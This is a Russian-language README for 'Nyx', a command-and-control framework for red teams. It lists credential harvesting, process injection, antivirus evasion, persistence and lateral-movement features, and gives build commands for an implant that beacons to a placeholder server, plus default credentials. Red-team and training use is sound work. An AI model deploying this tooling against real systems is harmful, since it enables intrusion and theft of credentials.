Модульный C2-фреймворк с кроссплатформенным агентом, сбором учётных данных и латеральным перемещением.
Инструмент для извлечения паролей, хешей, PIN-кодов и Kerberos-тикетов из памяти Windows. Поддерживает Pass-the-Hash, Pass-the-Ticket, Golden/Silver Ticket, …
Кросс-платформенный инструмент для извлечения сохранённых паролей из десятков приложений: браузеры, почтовые клиенты, SSH-клиенты, мессенджеры, БД, VPN, …
Современный C2-фреймворк (Command & Control) с поддержкой кастомных имплантов (Demon), reflective loading, sleep obfuscation, OPSEC-режимов и …
Мониторинг процессов Linux без root-доступа. Перехватывает procfs-события в реальном времени — видит все запускаемые процессы, их …
git clone https://github.com/omerbyrb/nyx cd nyx docker compose up -d cd server python3.11 -m venv .venv && source .venv/bin/activate pip install -r requirements.txt cd dashboard npm install && npm run dev cd agent go build -o nyx-agent . GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -X main.C2URL=http://YOUR_SERVER:8000" -o nyx-agent.exe . GOOS=linux GOARCH=amd64 go build -ldflags="-s -w -X main.C2URL=http://YOUR_SERVER:8000" -o nyx-agent-linux .

Фреймворк Command & Control с открытым исходным кодом для операций красной команды и симуляции действий противника
Только для авторизованного тестирования на проникновение, учений красной команды, соревнований CTF и обучения информационной безопасности.
| Функция | Подробности |
|---|---|
| Кроссплатформенный агент | Единый бинарный файл на Go — Linux, macOS, Windows (arm64 + amd64) |
| C2 в реальном времени | Потоковая передача задач на основе WebSocket, без поллинга |
| Конструктор пейлоадов | Компиляция кастомных агентов со встроенным URL C2 из панели управления |
| JWT-аутентификация | Вход оператора, управление сессиями на основе токенов |
| Поддержка HTTPS | TLS с флагом --tls на любом порту |
| Персистентность | macOS LaunchAgent / Linux cron / реестр Windows |
| Передача файлов | Скачивание файлов с агентов, загрузка файлов на агенты |
| Инъекция процессов | Linux ptrace (удаленный mmap + запись шелл-кода), Windows CreateRemoteThread |
| Обход антивирусов | XOR-обфускация строк URL C2 со случайным ключом для каждой сборки |
| Многопользовательский RBAC | Роли admin / operator / readonly, интерфейс управления операторами |
| Латеральное перемещение | Выполнение команд по SSH (пароль + ключ), сканер TCP-портов, обнаружение хостов в сети /24 |
| Сбор учетных данных | Ключи SSH, история командной оболочки, учетные данные AWS/GCP/Azure/K8s/Docker/git/npm |
| Перечисление для повышения привилегий | sudo, SUID, cron, capabilities, группа docker, привилегии токенов Windows, UAC |
| Хранилище добычи | Единое представление: скачанные файлы, скриншоты, учетные данные, результаты сканирования, результаты SSH |
| DoH-маяк | Вторичный канал C2 через DNS-over-HTTPS (Cloudflare 1.1.1.1) |
| Шифрование AES-256-GCM | Весь трафик агент↔сервер шифруется на прикладном уровне (опционально) |
| Загрузчик шелл-кода | Выполнение шелл-кода внутри процесса через mmap (Linux/macOS) / VirtualAlloc (Windows) |
| SMB / WMI / PSExec | Латеральное перемещение в Windows: net use + WMIC + PowerShell Remoting |
| Дамп SAM | Дамп учетных данных Windows через reg save (требуются права SYSTEM) |
| Карта сети | SVG-визуализация топологии просканированных хостов с легендой портов |
| Просмотр скриншотов | Захват экрана агента — отображается встроенным изображением в Консоли |
| Экспорт IOC | Полный отчет в JSON: IP-адреса, имена хостов, команды, эксфильтрация файлов, флаги персистентности |
| Правила YARA | Автоматически сгенерированные правила обнаружения для бинарного файла агента + сетевого трафика + персистентности |
| MITRE ATT&CK | TTP автоматически сопоставляются с выполненными командами |
| Заметки и теги агентов | Аннотирование скомпрометированных хостов пользовательскими заметками и цветными тегами |
| Обнаружение Heartbeat | Агенты автоматически помечаются как неактивные после 5 минут молчания |
| Панель оператора | Интерфейс на React + Framer Motion с мониторингом агентов в реальном времени |
| Развертывание через Docker | Развертывание одной командой docker compose up |
┌─────────────────────────────────────────────────┐
│ Operator │
│ React Dashboard (port 3000) │
└─────────────┬───────────────────────────────────┘
│ HTTPS / WebSocket
┌─────────────▼───────────────────────────────────┐
│ Nyx C2 Server │
│ FastAPI + SQLite (port 8000/8443) │
└─────────────┬───────────────────────────────────┘
│ HTTPS beacon
┌─────────────▼───────────────────────────────────┐
│ Nyx Agent │
│ Go binary — Linux / macOS / Windows │
└─────────────────────────────────────────────────┘
git clone https://github.com/omerbyrb/nyx
cd nyx
docker compose up -d
# Dashboard: http://localhost:3000
# API: http://localhost:8000
Сервер C2
cd server
python3.11 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt
python run.py # HTTP :8000
python run.py --tls --port 8443 # HTTPS :8443
Панель управления
cd dashboard
npm install && npm run dev
# Open http://localhost:5173
Агент — локальная сборка
cd agent
go build -o nyx-agent .
./nyx-agent
Агент — кросс-компиляция
# Windows
GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -X main.C2URL=http://YOUR_SERVER:8000" -o nyx-agent.exe .
# Linux
GOOS=linux GOARCH=amd64 go build -ldflags="-s -w -X main.C2URL=http://YOUR_SERVER:8000" -o nyx-agent-linux .
Учетные данные по умолчанию: operator / nyx2024
| Команда | Описание |
|---|---|
sysinfo |
Имя хоста, пользователь, ОС, архитектура, PID, IP |
shell <cmd> |
Выполнить команду оболочки |
whoami |
Текущий пользователь |
ls [path] |
Список содержимого директории |
cat <file> |
Чтение файла |
ps |
Запущенные процессы |
env |
Переменные окружения |
netstat |
Активные сетевые соединения |
ifconfig |
Сетевые интерфейсы |
download <path> |
Эксфильтрация файла с агента |
upload <path> <b64> |
Загрузка файла на агент |
screenshot |
Захват экрана агента |
persist |
Установка механизма персистентности |
unpersist |
Удаление персистентности |
sleep <sec> |
Установка интервала маяка |
kill |
Завершение работы агента |
Сгенерируйте скомпилированный бинарный файл агента прямо из панели управления:
Этот инструмент предназначен для авторизованного пентестинга, учений red team, соревнований CTF и обучения информационной безопасности. Несанкционированное использование против систем, на тестирование которых у вас нет явного разрешения, является незаконным. Автор не несёт ответственности за неправомерное использование.
Названо в честь Никты — греческой богини ночи